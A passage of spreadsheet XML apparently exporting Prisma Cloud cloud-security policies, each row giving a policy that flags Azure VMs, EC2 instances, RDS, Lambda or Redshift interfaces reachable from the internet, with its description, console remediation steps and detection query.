      </c>
      <c r="Q3472" t="inlineStr"/>
      <c r="R3472" t="inlineStr"/>
      <c r="S3472" t="inlineStr">
        <is>
          <t>network_config,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3472" t="b">
        <v>0</v>
      </c>
      <c r="U3472" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3472" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3472" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines with network path from the untrust internet source on ports with high risk.
Azure Virtual Machines with network path from the untrust internet source on ports with high risk increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits.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72" t="inlineStr">
        <is>
          <t>Restrict network path from the internet to reported Virtual machines based on your business requirement by modifying Network security group rules to the trusted IP address.
To modify Network security group rules,
1. Sign in to Azure Portal
2. Select 'All services'
3. Select 'Virtual Machines' under Compute
4. Identify the Virtual machine that you want to restrict access to Internet
4. Under 'Settings' click on 'Networking'
5. In 'Inbound port rules' section, add the IP addresses from Trusted IP Addresses.
Refer following link for detailed steps to modify Network security group rules,
https://learn.microsoft.com/en-us/azure/virtual-network/manage-network-security-group?tabs=network-security-group-portal#change-a-security-rule
NOTE: When modifying Network security group rules, make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.</t>
        </is>
      </c>
      <c r="Y3472" t="inlineStr"/>
      <c r="Z3472" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Instance' and dest.cloud.type = 'Azure' and protocol.ports in ('tcp/20', 'tcp/21','tcp/23','tcp/25', 'tcp/110', 'tcp/135', 'tcp/143', 'tcp/445', 'tcp/1433:1434', 'tcp/3000', 'tcp/3306', 'tcp/4333', 'tcp/5000', 'tcp/5432', 'tcp/5500', 'tcp/5601', 'tcp/8080', 'tcp/8088', 'tcp/8888', 'tcp/9200', 'tcp/9300') and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3472" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3472" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3472" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1012</t>
        </is>
      </c>
      <c r="AD3472" t="b">
        <v>1</v>
      </c>
      <c r="AE3472" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3472" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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2" t="inlineStr">
        <is>
          <t>fd704273-8feb-4eae-b15c-6659476313fc</t>
        </is>
      </c>
      <c r="AI3472" t="inlineStr">
        <is>
          <t>dfef7682-4d08-41be-bfd0-52dd6fa639fb</t>
        </is>
      </c>
      <c r="AJ3472" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3472" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3473">
      <c r="A3473" t="inlineStr"/>
      <c r="B3473" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3473" s="2" t="inlineStr"/>
      <c r="D3473" t="n">
        <v>4</v>
      </c>
      <c r="E3473" t="n">
        <v>1</v>
      </c>
      <c r="F3473" t="n">
        <v>0</v>
      </c>
      <c r="G3473" t="b">
        <v>1</v>
      </c>
      <c r="H347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73" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3473" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3473" t="inlineStr">
        <is>
          <t>AWS RDS managed ENI reachable from any untrust internet source</t>
        </is>
      </c>
      <c r="L3473" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3473" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3473" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3473" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3473" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3473" t="inlineStr"/>
      <c r="R3473" t="inlineStr"/>
      <c r="S3473" t="inlineStr">
        <is>
          <t>network_config,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3473" t="b">
        <v>0</v>
      </c>
      <c r="U3473" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3473" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3473" t="inlineStr">
        <is>
          <t>This policy identifies Network interfaces attached to RDS instances that are exposed to inbound traffic from any untrust internet source. RDS instances exposed to the internet are prone to external security threats. It is highly recommended to restrict network interfaces that are attached to the RDS instance to known hosts or services only.</t>
        </is>
      </c>
      <c r="X3473" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict traffic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RDS database instance inside a restrictive subnet.
 c) Define a NAT rule to restrict traffic coming from the Internet to the respective RDS database instance.</t>
        </is>
      </c>
      <c r="Y3473" t="inlineStr"/>
      <c r="Z3473" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Interface' and dest.cloud.type = 'AWS' and dest.network.interface.owner in ( 'amazon-rds')</t>
        </is>
      </c>
      <c r="AA3473" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3473" t="inlineStr">
        <is>
          <t>2024-02-12 14:52:22</t>
        </is>
      </c>
      <c r="AC3473" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-805</t>
        </is>
      </c>
      <c r="AD3473" t="b">
        <v>1</v>
      </c>
      <c r="AE3473" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3473" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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3" t="inlineStr">
        <is>
          <t>8bfa2a36-1ac4-48dc-bb34-70bc3f412572</t>
        </is>
      </c>
      <c r="AI3473" t="inlineStr">
        <is>
          <t>14e258a9-d851-4e0a-a1c4-9ebcc6aece88</t>
        </is>
      </c>
      <c r="AJ3473" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3473" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3474">
      <c r="A3474" t="inlineStr"/>
      <c r="B3474" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3474" s="2" t="inlineStr"/>
      <c r="D3474" t="inlineStr"/>
      <c r="E3474" t="inlineStr"/>
      <c r="F3474" t="inlineStr"/>
      <c r="G3474" t="b">
        <v>1</v>
      </c>
      <c r="H347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74" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3474" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3474" t="inlineStr">
        <is>
          <t>AWS Lambda function managed ENI reachable from any untrust internet source</t>
        </is>
      </c>
      <c r="L3474" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3474" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3474" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3474" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3474" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3474" t="inlineStr"/>
      <c r="R3474" t="inlineStr"/>
      <c r="S3474" t="inlineStr">
        <is>
          <t>network_config,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3474" t="b">
        <v>0</v>
      </c>
      <c r="U3474" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3474" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3474" t="inlineStr">
        <is>
          <t>This policy identifies Network interfaces attached to the Lambda function that are exposed to inbound traffic from any untrust internet source. Lambda function exposed to the internet are prone to external security threats. It is highly recommended to restrict network interfaces that are attached to the Lambda function to known hosts or services only.</t>
        </is>
      </c>
      <c r="X3474" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict traffic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Lambda function inside a restrictive subnet if the cluster does not need to be publicly accessible.
 c) Define a NAT rule to restrict traffic coming from the Internet to the respective Lambda function.</t>
        </is>
      </c>
      <c r="Y3474" t="inlineStr"/>
      <c r="Z3474" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Interface' and dest.cloud.type = 'AWS' and dest.network.interface.type = 'Lambda'</t>
        </is>
      </c>
      <c r="AA3474" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3474" t="inlineStr">
        <is>
          <t>2024-02-12 14:57:54</t>
        </is>
      </c>
      <c r="AC3474" t="inlineStr">
        <is>
          <t>PC-AWS-LMB-862</t>
        </is>
      </c>
      <c r="AD3474" t="b">
        <v>1</v>
      </c>
      <c r="AE3474" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3474" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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4" t="inlineStr">
        <is>
          <t>00d4e54a-19de-42d4-aabe-9bed2acb827b</t>
        </is>
      </c>
      <c r="AI3474" t="inlineStr">
        <is>
          <t>f52955c2-890f-4e32-af9b-adff4fde8e47</t>
        </is>
      </c>
      <c r="AJ3474" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3474" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3475">
      <c r="A3475" t="inlineStr"/>
      <c r="B3475" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3475" s="2" t="inlineStr"/>
      <c r="D3475" t="n">
        <v>200</v>
      </c>
      <c r="E3475" t="n">
        <v>24</v>
      </c>
      <c r="F3475" t="n">
        <v>67</v>
      </c>
      <c r="G3475" t="b">
        <v>1</v>
      </c>
      <c r="H347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75" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3475" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3475" t="inlineStr">
        <is>
          <t>AWS EC2 instance with network path from the untrust internet source on ports with high risk</t>
        </is>
      </c>
      <c r="L3475" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3475" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3475" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3475" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3475" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3475" t="inlineStr"/>
      <c r="R3475" t="inlineStr"/>
      <c r="S3475" t="inlineStr">
        <is>
          <t>network_config,Prisma_Cloud,SEC-01-01</t>
        </is>
      </c>
      <c r="T3475" t="b">
        <v>0</v>
      </c>
      <c r="U3475" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3475" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3475" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with network path from the untrust internet source on ports with high risk.
AWS EC2 instances with network path from the untrust internet source on ports with high risk increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits.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75" t="inlineStr">
        <is>
          <t>Restrict Internet exposure of reported EC2 instances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Add the IP addresses from the trusted IP addresses.
8. Click 'Save rules' to apply the changes.</t>
        </is>
      </c>
      <c r="Y3475" t="inlineStr"/>
      <c r="Z3475" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and dest.resource.state = 'Active' and protocol.ports in ( 'tcp/20:21', 'tcp/23', 'tcp/25', 'tcp/110', 'tcp/135', 'tcp/143', 'tcp/445', 'tcp/1433:1434', 'tcp/3000', 'tcp/3306', 'tcp/4333', 'tcp/5000', 'tcp/5432', 'tcp/5500', 'tcp/5601', 'tcp/8080', 'tcp/8088', 'tcp/8888', 'tcp/9200', 'tcp/9300' )</t>
        </is>
      </c>
      <c r="AA3475" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3475" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3475" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-870</t>
        </is>
      </c>
      <c r="AD3475" t="b">
        <v>1</v>
      </c>
      <c r="AE3475" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3475" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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5" t="inlineStr">
        <is>
          <t>37e2852a-2596-43d7-a573-cd2b468b1df2</t>
        </is>
      </c>
      <c r="AI3475" t="inlineStr">
        <is>
          <t>74578f09-bd27-46a6-9849-9e1e998b8558</t>
        </is>
      </c>
      <c r="AJ3475" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3475" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3476">
      <c r="A3476" t="inlineStr"/>
      <c r="B3476" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3476" s="2" t="inlineStr"/>
      <c r="D3476" t="n">
        <v>0</v>
      </c>
      <c r="E3476" t="n">
        <v>0</v>
      </c>
      <c r="F3476" t="n">
        <v>2</v>
      </c>
      <c r="G3476" t="b">
        <v>1</v>
      </c>
      <c r="H347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76" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3476" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3476" t="inlineStr">
        <is>
          <t>AWS VM instance in running state that is internet reachable with unrestricted access (0.0.0.0/0) [Beta]</t>
        </is>
      </c>
      <c r="L3476" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3476" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3476" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3476" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3476" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3476" t="inlineStr"/>
      <c r="R3476" t="inlineStr"/>
      <c r="S3476" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="T3476" t="b">
        <v>0</v>
      </c>
      <c r="U3476" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3476" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3476" t="inlineStr">
        <is>
          <t>This policy identifies AWS VM instances in running state that are internet reachable with unrestricted access (0.0.0.0/0). VM instances with unrestricted access to the internet may enable bad actors to use brute force on a system to gain unauthorised access to the entire network. As a best practice, restrict traffic from unknown IP addresses and limit the access to known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3476" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict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Network Security Group rules can be made more restrictive.
    b) Move the instance inside a restrictive subnet if the instance does not need to be publicly accessible.
    c) Remove or disassociate the public IP assigned to the respective instance.</t>
        </is>
      </c>
      <c r="Y3476" t="inlineStr"/>
      <c r="Z3476" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3476" t="inlineStr">
        <is>
          <t>Oluranti Omotayo</t>
        </is>
      </c>
      <c r="AB3476" t="inlineStr">
        <is>
          <t>2024-02-12 14:58:21</t>
        </is>
      </c>
      <c r="AC3476" t="inlineStr"/>
      <c r="AD3476" t="b">
        <v>1</v>
      </c>
      <c r="AE3476" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3476" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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6" t="inlineStr">
        <is>
          <t>9b65b849-057c-410c-aa5e-60ee1c14db13</t>
        </is>
      </c>
      <c r="AI3476" t="inlineStr">
        <is>
          <t>f6fc5d51-32e2-4005-882f-f17f184dc720</t>
        </is>
      </c>
      <c r="AJ3476" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3476" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3477">
      <c r="A3477" t="inlineStr"/>
      <c r="B3477" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3477" s="2" t="inlineStr"/>
      <c r="D3477" t="inlineStr"/>
      <c r="E3477" t="inlineStr"/>
      <c r="F3477" t="inlineStr"/>
      <c r="G3477" t="b">
        <v>1</v>
      </c>
      <c r="H3477"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 test-dish</t>
        </is>
      </c>
      <c r="I3477" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3477" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3477" t="inlineStr">
        <is>
          <t>AWS Redshift cluster with network path from the untrust internet source</t>
        </is>
      </c>
      <c r="L3477" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3477" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3477" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3477" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3477" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3477" t="inlineStr"/>
      <c r="R3477" t="inlineStr"/>
      <c r="S3477" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3477" t="b">
        <v>0</v>
      </c>
      <c r="U3477" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3477" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3477" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Redshift clusters with network path from the untrusted internet source.
Redshift clusters are AWS cloud-based data warehouses designed for data analysis and querying of large datasets. Allowing an AWS Redshift cluster to be reachable from any untrusted internet source increases the risk of unauthorized access and potential security breaches due to expanded attack surface.
It is recommended to restrict traffic from untrusted IP addresses and limit the access to known hosts, services, or specific entities for the Redshift clusters.
NOTE: Prisma Cloud Trusted IP List allows administrators to specify a list of IP addresses that are considered trusted or safe.</t>
        </is>
      </c>
      <c r="X3477" t="inlineStr">
        <is>
          <t>Restrict access to the AWS Redshift cluster by configuring Security group rules
1. Sign in to the AWS Console.
2. Navigate to the Redshift Dashboard.
3. In the 'Clusters' section, find the Redshift cluster you want to restrict public access to.
4. Click on the cluster to open its details.
5. Go to the 'Properties' tab.
6. In the 'Network and security settings' section, identify the VPC security groups associated with the cluster under the 'VPC security group' section
7. For each security group listed:
    6a. Click 'Edit inbound rules.'
    6b. Review and update inbound rules to add the IP addresses from Trusted IP Addresses and remove any that allow unrestricted access (0.0.0.0/0) or any untrusted IP ranges, ensuring that such CIDR ranges no longer exist.
  6c. Click 'Save rules' to apply the changes.</t>
        </is>
      </c>
      <c r="Y3477" t="inlineStr"/>
      <c r="Z3477" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'PaaS' and dest.cloud.type = 'AWS' and dest.paas.service.type = 'AWS Redshift'</t>
        </is>
      </c>
      <c r="AA3477" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3477" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:42</t>
        </is>
      </c>
      <c r="AC3477" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1241</t>
        </is>
      </c>
      <c r="AD3477" t="b">
        <v>1</v>
      </c>
      <c r="AE3477" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3477" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3477"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3477" t="inlineStr">
        <is>
          <t>f979490a-f9a1-4b07-9cfa-f0ccb81748a4</t>
        </is>
      </c>
      <c r="AI3477" t="inlineStr">
        <is>
          <t>aff96326-bc0b-4099-8ab0-610568ce7b13</t>
        </is>
      </c>
      <c r="AJ3477" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3477" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3478">
      <c r="A3478" t="inlineStr"/>
      <c r="B3478" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3478" s="2" t="inlineStr"/>
      <c r="D3478" t="inlineStr"/>
      <c r="E3478" t="inlineStr"/>
      <c r="F3478" t="inlineStr"/>
      <c r="G3478" t="b">
        <v>1</v>
      </c>
      <c r="H347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78" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3478" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3478" t="inlineStr">
        <is>
          <t>AWS Redshift managed ENI reachable from any untrust internet source</t>
        </is>
      </c>
      <c r="L3478" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3478" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3478" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3478" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3478" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3478" t="inlineStr"/>
      <c r="R3478" t="inlineStr"/>
      <c r="S3478" t="inlineStr">
        <is>
          <t>network_config,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3478" t="b">
        <v>0</v>
      </c>
      <c r="U3478" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3478" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3478" t="inlineStr">
        <is>
          <t>This policy identifies Network interfaces attached to the Redshift cluster that are exposed to inbound traffic from any untrust internet source. Redshift clusters exposed to the internet are prone to external security threats. It is highly recommended to restrict network interfaces that are attached to the Redshift cluster to known hosts or services only.</t>
        </is>
      </c>
      <c r="X3478" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict traffic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Redshift cluster inside a restrictive subnet if the cluster does not need to be publicly accessible.
 c) Define a NAT rule to restrict traffic coming from the Internet to the respective Redshift cluster.</t>
        </is>
      </c>
      <c r="Y3478" t="inlineStr"/>
      <c r="Z3478" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'Interface' and dest.cloud.type = 'AWS' and dest.network.interface.owner in ( 'amazon-redshift' )</t>
        </is>
      </c>
      <c r="AA3478" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3478" t="inlineStr">
        <is>
          <t>2024-02-12 14:50:25</t>
        </is>
      </c>
      <c r="AC3478" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-806</t>
        </is>
      </c>
      <c r="AD3478" t="b">
        <v>1</v>
      </c>
      <c r="AE3478" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3478" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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8" t="inlineStr">
        <is>
          <t>d42a754c-acfe-4be8-8c42-7b3cc6af1851</t>
        </is>
      </c>
      <c r="AI3478" t="inlineStr">
        <is>
          <t>40eb4d49-bda7-47b6-a943-6a20218c25fe</t>
        </is>
      </c>
      <c r="AJ3478" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3478" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3479">
      <c r="A3479" t="inlineStr"/>
      <c r="B3479" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3479" s="2" t="inlineStr"/>
      <c r="D3479" t="n">
        <v>344</v>
      </c>
      <c r="E3479" t="n">
        <v>16</v>
      </c>
      <c r="F3479" t="n">
        <v>72</v>
      </c>
      <c r="G3479" t="b">
        <v>1</v>
      </c>
      <c r="H347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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3479" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3479" t="inlineStr">
        <is>
          <t>AWS EC2 instance with network path from the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3479" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3479" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3479" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3479" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3479" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3479" t="inlineStr"/>
      <c r="R3479" t="inlineStr"/>
      <c r="S3479" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3479" t="b">
        <v>0</v>
      </c>
      <c r="U3479" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3479" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3479" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with network path from the internet (0.0.0.0/0).
AWS EC2 instances with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3479" t="inlineStr">
        <is>
          <t>Restrict Internet exposure of reported EC2 instances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t>
        </is>
      </c>
      <c r="Y3479" t="inlineStr"/>
      <c r="Z3479" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'AWS' and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3479" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3479" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3479" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-803</t>
        </is>
      </c>
      <c r="AD3479" t="b">
        <v>1</v>
      </c>
      <c r="AE3479" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3479" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG347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79" t="inlineStr">
        <is>
          <t>ad23603d-754e-4499-8988-b80178785898</t>
        </is>
      </c>
      <c r="AI3479" t="inlineStr">
        <is>
          <t>893e3897-af4b-4cbe-b665-23e1f19f8f0b</t>
        </is>
      </c>
      <c r="AJ3479" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3479" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3480">
      <c r="A3480" t="inlineStr"/>
      <c r="B3480" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3480" s="2" t="inlineStr"/>
      <c r="D3480" t="n">
        <v>134</v>
      </c>
      <c r="E3480" t="n">
        <v>8</v>
      </c>
      <c r="F3480" t="n">
        <v>2</v>
      </c>
      <c r="G3480" t="b">
        <v>1</v>
      </c>
      <c r="H348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80" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3480" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3480" t="inlineStr">
        <is>
          <t>AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports</t>
        </is>
      </c>
      <c r="L3480" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3480" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3480" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3480" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3480" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3480" t="inlineStr"/>
      <c r="R3480" t="inlineStr"/>
      <c r="S3480" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config,Prisma_Cloud</t>
